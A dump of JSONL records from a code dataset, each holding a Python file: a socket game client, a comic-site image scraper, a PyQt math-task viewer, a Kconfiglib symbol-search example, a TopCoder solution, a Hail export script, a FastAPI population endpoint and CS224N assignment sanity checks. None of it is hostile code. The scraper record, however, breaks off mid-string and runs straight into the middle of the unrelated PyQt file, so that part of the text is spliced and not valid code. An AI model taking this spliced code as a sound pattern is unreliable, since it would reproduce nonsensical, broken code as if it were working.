+{"seq_id":"398375686","text":"import socket\nimport threading\nimport sys\nimport pickle\nimport json\nfrom PyQt5.QtCore import QThread\n\nHOST = \"0.0.0.0\"\nPORT = 8080\n\nclass Usuario:\n def __init__(self, name, score=0):\n self.name = name\n self.score = score\n\nclass Cliente:\n def __init__(self, usuario, host, port):\n print(\"Inicializando cliente...\")\n\n self.usuario = usuario\n self.usr_cls = None\n self.host = host\n self.port = port\n self.socket_cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.categorias = list()\n self.categorias_r = False\n\n try:\n self.connect_to_server()\n # self.recibidor = threading.Thread(target=self.recibir_mensajes, args=())\n # self.recibidor.daemon = True\n self.listen()\n self._isalive = True\n\n except:\n print(\"Conexión terminada\")\n self.socket_cliente.close()\n exit()\n\n def 
connect_to_server(self):\n self.socket_cliente.connect((self.host, self.port))\n\n def listen(self):\n thread = threading.Thread(target=self.listen_thread, daemon=True)\n thread.start()\n\n def listen_thread(self):\n # self.nombrar()\n while True:\n response_bytes_length = self.socket_cliente.recv(2)\n response_length = int.from_bytes(response_bytes_length, byteorder=\"big\")\n\n if response_length == 10:\n self.crear_usuario()\n\n if response_length == 1:\n self.recibir_categorias()\n\n if response_length == 2:\n self.recibir_mensajes()\n\n def recibir_mensajes(self):\n while self._isalive:\n response_bytes_length = self.socket_cliente.recv(4)\n response_length = int.from_bytes(response_bytes_length, byteorder=\"big\")\n response = b\"\"\n\n # Receive data until we reach the total amount of data\n # indicated by the first 4 bytes received.\n response += self.socket_cliente.recv(response_length)\n\n decoded = response.decode()\n msg = json.loads(decoded)\n self.recibido = msg\n\n # print('{}: {}'.format(msg['user'], msg['content']))\n\n\n # The send() method sends messages to the server. It implements the same\n # communication protocol mentioned above, i.e. it prepends 4 bytes\n # to each message indicating the length of the message being sent.\n def send(self, msg):\n msg_bytes = msg.encode()\n msg_length = len(msg_bytes).to_bytes(4, byteorder=\"big\")\n self.socket_cliente.send(msg_length + msg_bytes)\n\n\n def nombrar(self):\n señal = 10\n self.socket_cliente.send(señal.to_bytes(1, byteorder='big')\n + len(self.usuario).to_bytes(2, byteorder='big')\n + self.usuario.encode())\n\n def crear_usuario(self):\n tamaño = int.from_bytes(self.socket_cliente.recv(2), byteorder='big')\n obj = b\"\"\n\n obj += self.socket_cliente.recv(tamaño)\n a = obj.decode()\n dict = json.loads(a)\n self.usr_cls = Usuario(dict['name'], dict['score'])\n self.pedir_categorias()\n print(self.usr_cls.name)\n return self.usr_cls\n\n def actualizar_usuario(self):\n señal = 9\n self.socket_cliente.send(señal.to_bytes(1, byteorder='big')\n + len(self.usuario).to_bytes(2, byteorder='big')\n + pickle.dumps(self.usuario))\n\n def pedir_categorias(self):\n señal = 1\n self.socket_cliente.send(señal.to_bytes(1, byteorder='big'))\n\n def recibir_categorias(self):\n response_bytes_length = self.socket_cliente.recv(4)\n response_length = int.from_bytes(response_bytes_length, byteorder=\"big\")\n\n if response_length == 111:\n self.categorias_r = True\n return self\n\n response = b\"\"\n\n response += self.socket_cliente.recv(response_length)\n\n genero = response.decode()\n self.categorias.append(genero)\n\n\n\nif __name__ == '__main__':\n\n usuario = \"usuario\"\n client = Cliente(usuario, HOST, PORT)\n\n #while True:\n # pass\n","sub_path":"Tareas/T06/client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"530470749","text":"import re\nimport os\nimport sys\nimport time\nimport requests\nimport random\nfrom name_list import NAME\nfrom fileoperate import *\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))\n\n\n# Randomly pick a user agent\nuser_agent_list = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',\n 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) 
AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',\n 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',\n 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n]\nuser_agent = random.choice(user_agent_list)\n\n# Pass the chosen user agent to the request headers\nheaders = { 'User-Agent': user_agent }\n\n\ndef myRequests(url):\n \"\"\"\n Request the given URL.\n Retries the request to make sure it is re-sent when it fails.\n params:\n url: request URL\n \"\"\"\n try:\n response = requests.get(url,headers=headers)\n except Exception as e:\n time.sleep(10)\n try:\n response = requests.get(url, headers=headers)\n except Exception as e:\n time.sleep(10)\n response = requests.get(url, headers=headers)\n sys.exit(1)\n return response\n\n\ndef get_chapter_url_list(url):\n \"\"\"\n Get the chapter link URLs.\n params:\n url: comic catalog URL\n return:\n name_list: list of chapter URLs\n \"\"\"\n response = myRequests(url)\n html = response.text\n name_list = re.findall(r'/comic/7580/\\d{4,11}.html', html)\n for i in range(0,len(name_list)):\n name_list[i] = \"https://www.manhuagui.com\" + name_list[i]\n time.sleep(1)\n return name_list\n\n\ndef create_comic_dir(dirname):\n \"\"\"\n Create the comic folder.\n params:\n dirname: folder name\n return:\n dir_name: folder path\n \"\"\"\n path = os.path.dirname(__file__)\n comic_dir = os.path.join(path, \"comic\")\n dir_name = os.path.join(comic_dir, dirname)\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n print(dir_name)\n return dir_name\n\n\ndef get_chapter_comic(chapter_url,pic_num,dir_name):\n \"\"\"\n Download the images of the given chapter.\n params:\n chapter_url: link of the chapter\n pic_num: image number, the starting index of this chapter's images\n \"\"\"\n time.sleep(1)\n response = myRequests(chapter_url)\n html = response.text\n name_list = re.findall(r'https://pic.muamh.com/static/upload/book/.{7,30}.jpg', html)\n while(len(name_list) == 0):\n response = myRequests(chapter_url)\n html = response.text\n name_list = re.findall(r'https://pic.muamh.com/static/upload/book/.{7,30}.jpg', html)\n print(name_list)\n for name in name_list:\n pic_num += 1\n num = \"%04d.jpg\"%pic_num\n filename = os.path.join(dir_name,num)\n download_comic_jpg(name,filename)\n return pic_num\n\n\ndef download_comic_jpg(comic_url, filename):\n \"\"\"\n Download a single image.\n params:\n comic_url: comic image URL\n filename: path where the image is saved\n return:\n \"\"\"\n response = myRequests(comic_url)\n print(filename)\n time.sleep(0.5)\n with open(filename,'wb') as f:\n f.write(response.content)\n\n\ndef start_download(chapter_url_list,dir_name,cstart=1,pstart=0):\n \"\"\"\n Download the comic for the given chapter list.\n params:\n chapter_url_list: chapter links\n dir_name: comic folder path\n cstart: starting chapter, base=0\n pstart: current comic image number\n \"\"\"\n current_chapter = cstart -1\n pic_start = pstart\n for name in chapter_url_list[cstart:]:\n current_chapter += 1\n print(name,\"chapter\",current_chapter)\n # pic_start = get_chapter_comic(name, pic_start,dir_name)\n\ndef run_exe(comic_dir,dir_url):\n dirName= create_comic_dir(comic_dir)\n chapter_list = get_chapter_url_list(dir_url)\n print(len(chapter_list),chapter_list)\n start_download(chapter_list,dirName,1,0)\n\ndef get_comic_list_by_page(page=1):\n \"\"\"\n Get the list of comic names.\n \"\"\"\n current_page = 
page\n name_set = set()\n url = \"\"\n for i in range(current_page,24):\n url = \"https://www.5wmh.com/booklist?page={}&tag=%E5%89%A7%E6%83%85&area=-1&end=-1\".format(i)\n print(url)\n response = myRequests(url)\n html = response.text\n name_list = re.findall('href=\"(https://www.5wmh.com/book/.{4,8}).html\" title=\"(.{2,15})\"', html)\n for name in name_list:\n if \" 0) else randint(1, math.ceil(ans) + 3)\n print(math.ceil(min))\n print(math.ceil(ans + 10))\n pass\n radio = QRadioButton(round(str(randint(math.ceil(min), math.ceil(ans + 10)) * (randint(40, 60) / 50 if not isDigit else 1))))\n else:\n radio = QRadioButton(self.tasks[i][1])\n\n radios.append(radio)\n\n groupVBoxLayout.addWidget(radio)\n\n self.groupBoxes[i].setLayout(groupVBoxLayout)\n\n if not self.isTesting:\n self.lines_edit.append(line_edit)\n self.user_answers.append(self.lines_edit[i].text())\n else:\n self.lines_edit.append(self.groupBoxes[i])\n\n self.all_radios.append(radios)\n\n\n # line_edit.textEdited.connect(lambda text: self.set_style_line_edit(line_edit, 'black'))\n\n\n # self.tasks.append(generate_task(self))\n problem_text = (str(i + 1) + '. ' if len(self.tasks) > 1 else ' ') + self.tasks[i][0]\n problem = QLabel(problem_text, self)\n\n problem.setFont(QFont('SansSerif', 14))\n\n # grid.addWidget(problem, 2 * i, 0)\n vbox.addWidget(problem)\n\n if self.theme == 'Графы' and self.difficulty == 3:\n layout = QVBoxLayout()\n pixmap = QPixmap('path_graph_cities.png')\n\n lbl = QLabel(self)\n lbl.setPixmap(pixmap)\n\n layout.addWidget(lbl)\n\n vbox_widget = QWidget()\n vbox_widget.setLayout(layout)\n\n vbox.addWidget(vbox_widget)\n\n # grid.setSpacing(50)\\\n hbox = QHBoxLayout()\n\n self.results.append(QLabel())\n\n hbox.addWidget(self.lines_edit[i])\n\n hbox.addWidget(self.results[i])\n hbox.addStretch(1)\n\n hbox_widget = QWidget()\n hbox_widget.setLayout(hbox)\n\n self.grids.append(hbox)\n\n if self.tasks[i][1]:\n vbox.addWidget(hbox_widget)\n\n\n\n pdf.output(\"Задачи.pdf\")\n\n # self.generate_tasks_from_pattern()\n\n vbox.addWidget(QLabel(' ' * 130))\n\n self.grids.append(vbox)\n\n self.result = QLabel()\n self.result.setStyleSheet('color: #383396;'\n 'font: bold large \"Times New Roman\";'\n 'font-size: 19pt;'\n )\n\n vbox.addWidget(self.result)\n\n vbox.addStretch(30)\n\n self.hbox.addWidget(clean_button)\n self.hbox.addWidget(testing_mode_button)\n self.hbox.addStretch(30)\n self.hbox.addWidget(answer_button)\n\n self.hbox.addStretch(1)\n self.hbox.addWidget(check_button)\n\n vbox_widget = QWidget()\n vbox_widget.setLayout(vbox)\n\n scroll_area = QScrollArea()\n scroll_area.setWidget(vbox_widget)\n\n scroll_area.setWidgetResizable(False)\n scroll_area.setFrameStyle(QFrame.NoFrame)\n\n error_label = QLabel('Не найдено подходящих задач!')\n error_label.setFont(QFont('', 22))\n error_label.setStyleSheet('qproperty-alignment: AlignCenter;'\n 'color: #f44b42;'\n 'font: bold large \"Times New Roman\";'\n ''\n )\n\n self.vbox.addWidget(title_label)\n\n if not self.tasks:\n self.vbox.addStretch(4)\n self.vbox.addWidget(error_label)\n self.vbox.addStretch(10)\n\n self.vbox.addWidget(scroll_area)\n # self.vbox.addLayout(grid)\n\n # self.vbox.addStretch(10)\n self.vbox.addLayout(self.hbox)\n\n testing_mode_button.clicked.connect(self.switch_testing_mode)\n clean_button.clicked.connect(self.clean_answers)\n check_button.clicked.connect(self.check_answers)\n 
answer_button.clicked.connect(self.show_answers)","sub_path":"ShowTasks.py","file_name":"ShowTasks.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"182866545","text":"# Prints all symbols, choices, menus, and comments that reference a symbol with\n# a particular name in any of their properties or property conditions.\n# Demonstrates expression fetching and walking.\n#\n# Usage:\n#\n# $ make [ARCH=] scriptconfig SCRIPT=Kconfiglib/examples/find_symbol.py SCRIPT_ARG=\n#\n# Example output for SCRIPT_ARG=X86:\n#\n#\n# Found 452 locations that reference 'X86':\n# \n# ========== Location 1 (init/Kconfig:1122) ==========\n# \n# config SGETMASK_SYSCALL\n# bool\n# prompt \"sgetmask/ssetmask syscalls support\" if EXPERT\n# default PARISC || MN10300 || BLACKFIN || M68K || PPC || MIPS || X86 || SPARC || CRIS || MICROBLAZE || SUPERH\n# help\n# sys_sgetmask and sys_ssetmask are obsolete system calls\n# no longer supported in libc but still enabled by default in some\n# architectures.\n# \n# If unsure, leave the default option here.\n# \n# ---------- Parent 1 (init/Kconfig:1091) ----------\n# \n# menuconfig EXPERT\n# bool\n# prompt \"Configure standard kernel features (expert users)\"\n# select DEBUG_KERNEL\n# help\n# This option allows certain base kernel options and settings\n# to be disabled or tweaked. This is for specialized\n# environments which can tolerate a \"non-standard\" kernel.\n# Only use this if you really know what you are doing.\n# \n# ---------- Parent 2 (init/Kconfig:39) ----------\n# \n# menu \"General setup\"\n# \n# ========== Location 2 (arch/Kconfig:28) ==========\n# \n# config OPROFILE_EVENT_MULTIPLEX\n# bool\n# prompt \"OProfile multiplexing support (EXPERIMENTAL)\" if OPROFILE && X86\n# default \"n\" if OPROFILE && X86\n# help\n# The number of hardware counters is limited. The multiplexing\n# feature enables OProfile to gather more events than counters\n# are provided by the hardware. This is realized by switching\n# between events at a user specified time interval.\n# \n# If unsure, say N.\n# \n# ---------- Parent 1 (arch/Kconfig:15) ----------\n# \n# config OPROFILE\n# ... 
(tons more lines)\n\nfrom kconfiglib import Kconfig, Symbol, expr_items, Choice, MENU, COMMENT, NOT\nimport sys\n\ndef expr_contains_sym(expr, sym_name):\n \"\"\"\n Returns True if a symbol (or choice, though that's unlikely) with name\n 'sym_name' appears in the expression 'expr', and False otherwise.\n\n Note that \"foo\" is represented as a constant symbol, like in the C\n implementation.\n \"\"\"\n for item in expr_items(expr):\n if item.name == sym_name:\n return True\n\n return False\n\ndef sc_references_sym(sc, sym_name):\n \"\"\"\n Returns True if a symbol with name 'sym_name' appears in any of the\n properties or property conditions of the Symbol or Choice 'sc', and False\n otherwise.\n \"\"\"\n # Search defaults\n for default, cond in sc.defaults:\n if expr_contains_sym(default, sym_name) or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n if isinstance(sc, Symbol):\n # Search selects\n for select, cond in sc.selects:\n if select.name == sym_name or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n # Search implies\n for imply, cond in sc.implies:\n if imply.name == sym_name or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n # Search ranges\n for low, high, cond in sc.ranges:\n if low.name == sym_name or \\\n high.name == sym_name or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n return False\n\ndef node_references_sym(node, sym_name):\n \"\"\"\n Returns True if a symbol with name 'sym_name' appears in the prompt\n condition of the MenuNode 'node' or in any of the properties of a\n symbol/choice stored in the menu node, and False otherwise.\n\n For MENU menu nodes, also searches the 'visible if' condition.\n\n Note that prompts are always stored in menu nodes. This is why a symbol can\n be defined in multiple locations and have a different prompt in each\n location. For MENU and COMMENT menu nodes, the prompt holds the menu title\n or comment text. This organization matches the C implementation.\n \"\"\"\n if node.prompt:\n # Search the prompt condition\n if expr_contains_sym(node.prompt[1], sym_name):\n return True\n\n if isinstance(node.item, (Symbol, Choice)):\n # Search symbol or choice\n return sc_references_sym(node.item, sym_name)\n\n if node.item == MENU:\n # Search the 'visible if' condition\n return expr_contains_sym(node.visibility, sym_name)\n\n # Comments are already handled by searching the prompt condition, because\n # 'depends on' gets propagated to it. This is why we don't need to look at\n # the direct dependencies for MENU either.\n\ndef nodes_referencing_sym(node, sym_name):\n \"\"\"\n Returns a list of all menu nodes in the menu tree rooted at 'node' that\n reference a symbol with name 'sym_name' in any of their properties. 
Also\n checks the properties of any symbols or choices contained in the menu\n nodes.\n \"\"\"\n res = []\n\n while node:\n if node_references_sym(node, sym_name):\n res.append(node)\n\n if node.list:\n res.extend(nodes_referencing_sym(node.list, sym_name))\n\n node = node.next\n\n return res\n\n# find_undefined.py makes use of nodes_referencing_sym(), so allow this file\n# to be imported\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n sys.exit('Pass symbol name (without \"CONFIG_\" prefix) with SCRIPT_ARG=')\n\n sym_name = sys.argv[2]\n\n kconf = Kconfig(sys.argv[1])\n nodes = nodes_referencing_sym(kconf.top_node, sym_name)\n\n if not nodes:\n sys.exit(\"No reference to '{}' found\".format(sym_name))\n\n print(\"Found {} locations that reference '{}':\\n\".format(len(nodes), sym_name))\n\n for i, node in enumerate(nodes, 1):\n print(\"========== Location {} ({}:{}) ==========\\n\".format(i, node.filename, node.linenr))\n print(node)\n\n parent_i = 0\n\n # Print the parents of the menu node too\n while True:\n node = node.parent\n if node is kconf.top_node:\n # Don't print the top node. Would say something like the\n # following, which isn't that interesting:\n #\n # menu \"Linux/$ARCH $KERNELVERSION Kernel Configuration\"\n break\n\n parent_i += 1\n\n print(\"---------- Parent {} ({}:{}) ----------\\n\"\n .format(parent_i, node.filename, node.linenr))\n print(node)\n","sub_path":"examples/find_symbol.py","file_name":"find_symbol.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293755766","text":"import math\n\ndef numberOfParticipants(marks):\n\tintMarks= []\n\tfor mark in marks:\n\t\tintMarks += [int( float( n ) * 1000 + 1e-9) for n in mark.split(\" \")]\n\n\tfor cand in xrange( 1, 100000 ):\n\t\tallMarks = { i * 1000 / cand for i in xrange( cand * 10 + 1) }\n\t\tgood = True\n\t\tfor mark in intMarks:\n\t\t\tif mark not in allMarks:\n\t\t\t\tgood = False\n\t\t\t\tbreak\n\n\t\tif good:\n\t\t\treturn cand\n\n\treturn 0\n","sub_path":"d1d2_under_80/AverageProblem/solve/python/AverageProblem.py","file_name":"AverageProblem.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"583118157","text":"#!/usr/bin/env python\n\nimport hail\nfrom hail.expr import TStruct\nfrom pprint import pprint\n\ndef flatten_struct(struct, root='', leaf_only=True):\n result = {}\n for f in struct.fields:\n path = '%s.%s' % (root, f.name)\n if isinstance(f.typ, TStruct):\n result.update(flatten_struct(f.typ, path))\n if not leaf_only:\n result[path] = f\n else:\n result[path] = f\n return result\n\nhc = hail.HailContext(log=\"/hail.log\")\ngenomes_vds = hc.read('gs://gnomad-public/release/2.0.2/vds/genomes/gnomad.genomes.r2.0.2.sites.vds')\n\nas_filter_status_fields=['va.info.AS_FilterStatus']\nas_filter_status_attributes = flatten_struct(genomes_vds.variant_schema, root=\"va\")\nas_filter_status_expression = ['%s = %s.map(x => orMissing(isDefined(x), if(x.isEmpty()) \"PASS\" else x.toArray.mkString(\"|\")))' % (x, x) for x in as_filter_status_fields]\n\ngenomes_vds = genomes_vds.annotate_variants_expr(as_filter_status_expression)\npprint(genomes_vds.variant_schema)\ngenomes_vds.export_vcf('gs://gnomad-browser/genomes/sept-2017-release-202-parts/gnomad.genomes.r2.0.2.sites.parts.vcf.bgz', 
parallel=True)\n","sub_path":"projects/gnomad/data/export_genomes_as_parts.py","file_name":"export_genomes_as_parts.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"162392129","text":"from fastapi import APIRouter, HTTPException\r\nimport pandas as pd\r\nimport plotly.express as px\r\nimport os\r\n\r\nrouter = APIRouter()\r\n\r\nDATA_FILEPATH1 = os.path.join(os.path.dirname(__file__), \"..\", \"..\",\"data\", \"current_pop_data_final.csv\")\r\nDATA_FILEPATH2 = os.path.join(os.path.dirname(__file__), \"..\", \"..\",\"data\", \"historical_pop_data_final.csv\")\r\n\r\n@router.get('/population/{city_id}')\r\nasync def pop_to_dict(city_id: int):\r\n \"\"\"\r\n Pull demographic data for specific city, state, and year \r\n\r\n ### Query Parameters: \r\n\r\n - `city_id`: [city_id], unique numeric mapping (ex: 0 returns Anchorage, AK)\r\n\r\n ### Response\r\n Dictionary object \r\n \"\"\"\r\n rt_dict = {}\r\n rt_data_dict = {}\r\n \r\n df = pd.read_csv(DATA_FILEPATH1, encoding='utf-8')\r\n dataframe = df[df['city_id']==city_id]\r\n rt_data = dataframe.to_numpy()\r\n \r\n rt_data_dict[\"total_pop\"] = rt_data[0][4]\r\n rt_data_dict[\"land_area\"] = rt_data[0][5]\r\n rt_data_dict[\"pop_density\"] = rt_data[0][6]\r\n rt_data_dict[\"male_pop\"] = rt_data[0][7]\r\n rt_data_dict[\"female_pop\"] = rt_data[0][8]\r\n rt_data_dict[\"age_under_20\"] = rt_data[0][9]\r\n rt_data_dict[\"age_20-29\"] = rt_data[0][10]\r\n rt_data_dict[\"age_30-39\"] = rt_data[0][11]\r\n rt_data_dict[\"age_40-49\"] = rt_data[0][12]\r\n rt_data_dict[\"age_50-59\"] = rt_data[0][13]\r\n rt_data_dict[\"age_above_60\"] = rt_data[0][14]\r\n \r\n rt_dict[\"data\"] = rt_data_dict \r\n rt_dict[\"viz\"] = citypopviz(city=rt_data[0][1], state=rt_data[0][2])\r\n return rt_dict\r\n\r\ndef citypopviz(city, state,metric = 'total_pop'):\r\n \"\"\"\r\n Visualize historical population metrics from 2010 to 2018 for one city \r\n\r\n ### Query Parameters:\r\n\r\n - `metric`: 'total_pop', 'land_area', 'pop_density', 'male_pop', 'female_pop',\r\n 'age_under_20', 'age_20-29', 'age_30-39', 'age_40-49', 'age_50-59', or 'age_above_60';\r\n default='total_pop',case sensitive, total/male/female pop in thousands, land area\r\n in sq mi, pop_density in person/sqmi, age demographics in percentages\r\n\r\n - `city`: [city name], case sensitive(ex: Birmingham)\r\n\r\n - `state `: [state abbreviation], 2-letters; case sensitive (ex: AL) \r\n\r\n ### Response\r\n JSON string to render with react-plotly.js\r\n \"\"\"\r\n df = pd.read_csv(DATA_FILEPATH2, encoding='utf-8')\r\n subset = df[(df.city == city) & (df.state == state)]\r\n fig = px.line(subset, x='year', y=metric, title=f'{metric} in {city},{state}')\r\n return fig.to_json()\r\n","sub_path":"project/app/api/.ipynb_checkpoints/population-checkpoint.py","file_name":"population-checkpoint.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"215497174","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2019-20: Homework 5\nsanity_check.py: sanity checks for assignment 5\nUsage:\n sanity_check.py 1e\n sanity_check.py 1f\n sanity_check.py 1g\n sanity_check.py 1h\n sanity_check.py 2a\n sanity_check.py 2b\n sanity_check.py 2c\n\"\"\"\nimport json\nimport math\nimport pickle\nimport sys\nimport time\n\nimport numpy as np\n\nfrom docopt import docopt\nfrom typing import List, Tuple, Dict, Set, 
Union\nfrom tqdm import tqdm\nfrom utils import pad_sents_char, batch_iter, read_corpus\nfrom vocab import Vocab, VocabEntry\nfrom highway import Highway, Highway_Shut\nfrom cnn import CNN \nfrom char_decoder import CharDecoder\nfrom nmt_model import NMT\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.utils\nimport torch.nn.functional as F\n\n#----------\n# CONSTANTS\n#----------\nBATCH_SIZE = 5\nEMBED_SIZE = 3\nHIDDEN_SIZE = 4\nDROPOUT_RATE = 0.0\n\nclass DummyVocab():\n def __init__(self):\n self.char2id = json.load(open('./sanity_check_en_es_data/char_vocab_sanity_check.json', 'r'))\n self.id2char = {id: char for char, id in self.char2id.items()}\n self.char_pad = self.char2id['']\n self.char_unk = self.char2id['']\n self.start_of_word = self.char2id[\"{\"]\n self.end_of_word = self.char2id[\"}\"]\n\ndef question_1e_sanity_check():\n \"\"\" Sanity check for to_input_tensor_char() function.\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1e: To Input Tensor Char\")\n print (\"-\"*80)\n vocabEntry = VocabEntry()\n\n print(\"Running test on a list of sentences\")\n sentences = [['Human', ':', 'What', 'do', 'we', 'want', '?'], ['Computer', ':', 'Natural', 'language', 'processing', '!'], ['Human', ':', 'When', 'do', 'we', 'want', 'it', '?'], ['Computer', ':', 'When', 'do', 'we', 'want', 'what', '?']]\n sentence_length = 8\n BATCH_SIZE = 4\n word_length = 12\n output = vocabEntry.to_input_tensor_char(sentences, 'cpu')\n output_expected_size = [sentence_length, BATCH_SIZE, word_length]\n assert list(output.size()) == output_expected_size, \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(output_expected_size, list(output.size()))\n\n print(\"Sanity Check Passed for Question 1e: To Input Tensor Char!\")\n print(\"-\"*80)\n\ndef question_1f_sanity_check(embed_dim,batch_size):\n \"\"\" Sanity check for Highway module.\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1f: Highway Module Implementation\")\n print (\"-\"*80)\n highway = Highway(embed_dim)\n #get values for proj_weight,proj_bias,gate_weight,gate_bias and calculate ourselves\n x_conv_out=torch.ones((batch_size,embed_dim), dtype=torch.float32)\n proj_weight=highway.projection.weight.data\n proj_bias=highway.projection.bias.data\n gate_weight=highway.gate.weight.data\n gate_bias=highway.gate.bias.data\n project_value=F.relu(torch.mm(proj_weight, x_conv_out.T)+proj_bias.unsqueeze(1))\n gate_value=torch.sigmoid(torch.mm(gate_weight, x_conv_out.T)+gate_bias.unsqueeze(1))\n x_highway_test=torch.mul(project_value.T, gate_value.T)+torch.mul((1-gate_value.T),x_conv_out)\n x_highway=highway(x_conv_out)\n input_expected_size=[batch_size,embed_dim]\n #test when the gate closed (initialise gate_weight with very negative values) \n highway_shut=Highway_Shut(embed_dim)\n x_highway_shut=highway_shut(x_conv_out)\n assert list(x_conv_out.size()) == input_expected_size, \"input shape is incorrect: it should be:\\n {} but is:\\n{}\".format(input_expected_size, list(x_conv_out.size()))\n assert x_highway.size() == x_conv_out.size(), \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(list(x_conv_out.size()), list(x_highway.size()))\n assert np.allclose(x_highway.detach().numpy(),x_highway_test.detach().numpy()), \"output is incorrect: it should be:\\n {} but is:\\n{}\".format(x_highway_test, x_highway)\n assert np.allclose(x_highway_shut.detach().numpy(),x_conv_out.numpy()), \"output is incorrect: it should be:\\n {} but is:\\n{}\".format(x_conv_out, 
x_highway_shut)\n print(\"Sanity Check Passed for Question 1f: Highway Module Implementation\")\n print(\"-\"*80)\n\ndef question_1g_sanity_check():\n \"\"\" \n Sanity check for CNN module.\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1g: CNN Module Implementation\")\n print (\"-\"*80)\n char_embedding_dim,word_embedding_dim,max_word_length=(5,3,10)\n batch_size=4\n sentence_length=20\n x_reshaped=torch.ones((sentence_length, batch_size, char_embedding_dim, max_word_length), dtype=torch.float32)\n cnn=CNN(char_embedding_dim,word_embedding_dim)\n output_expected_size=[sentence_length, batch_size, word_embedding_dim]\n x_conv_out=cnn(x_reshaped)\n assert(list(x_conv_out.size()) == output_expected_size), \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(output_expected_size, list(x_conv_out.size()))\n print(\"Sanity Check Passed for Question 1g: CNN Module Implementation\")\n print(\"-\"*80)\n\n\ndef question_1h_sanity_check(model):\n \"\"\" Sanity check for model_embeddings.py\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1h: Model Embedding\")\n print (\"-\"*80)\n sentence_length = 10\n max_word_length = 21\n inpt = torch.zeros(sentence_length, BATCH_SIZE, max_word_length, dtype=torch.long)\n ME_source = model.model_embeddings_source\n output = ME_source.forward(inpt)\n output_expected_size = [sentence_length, BATCH_SIZE, EMBED_SIZE]\n assert(list(output.size()) == output_expected_size), \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(output_expected_size, list(output.size()))\n print(\"Sanity Check Passed for Question 1h: Model Embedding!\")\n print(\"-\"*80)\n\ndef question_2a_sanity_check(decoder, char_vocab):\n \"\"\" Sanity check for CharDecoder.forward()\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 2a: CharDecoder.forward()\")\n print (\"-\"*80)\n sequence_length = 4\n inpt = torch.zeros(sequence_length, BATCH_SIZE, dtype=torch.long)\n logits, (dec_hidden1, dec_hidden2) = decoder.forward(inpt)\n logits_expected_size = [sequence_length, BATCH_SIZE, len(char_vocab.char2id)]\n dec_hidden_expected_size = [1, BATCH_SIZE, HIDDEN_SIZE]\n assert(list(logits.size()) == logits_expected_size), \"Logits shape is incorrect:\\n it should be {} but is:\\n{}\".format(logits_expected_size, list(logits.size()))\n assert(list(dec_hidden1.size()) == dec_hidden_expected_size), \"Decoder hidden state shape is incorrect:\\n it should be {} but is: {}\".format(dec_hidden_expected_size, list(dec_hidden1.size()))\n assert(list(dec_hidden2.size()) == dec_hidden_expected_size), \"Decoder hidden state shape is incorrect:\\n it should be {} but is: {}\".format(dec_hidden_expected_size, list(dec_hidden2.size()))\n print(\"Sanity Check Passed for Question 2a: CharDecoder.forward()!\")\n print(\"-\"*80)\n\ndef question_2b_sanity_check(decoder):\n \"\"\" Sanity check for CharDecoder.train_forward()\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 2b: CharDecoder.train_forward()\")\n print (\"-\"*80)\n sequence_length = 4\n inpt = torch.ones(sequence_length, BATCH_SIZE, dtype=torch.long)\n loss = decoder.train_forward(inpt)\n assert(list(loss.size()) == []), \"Loss should be a scalar but its shape is: 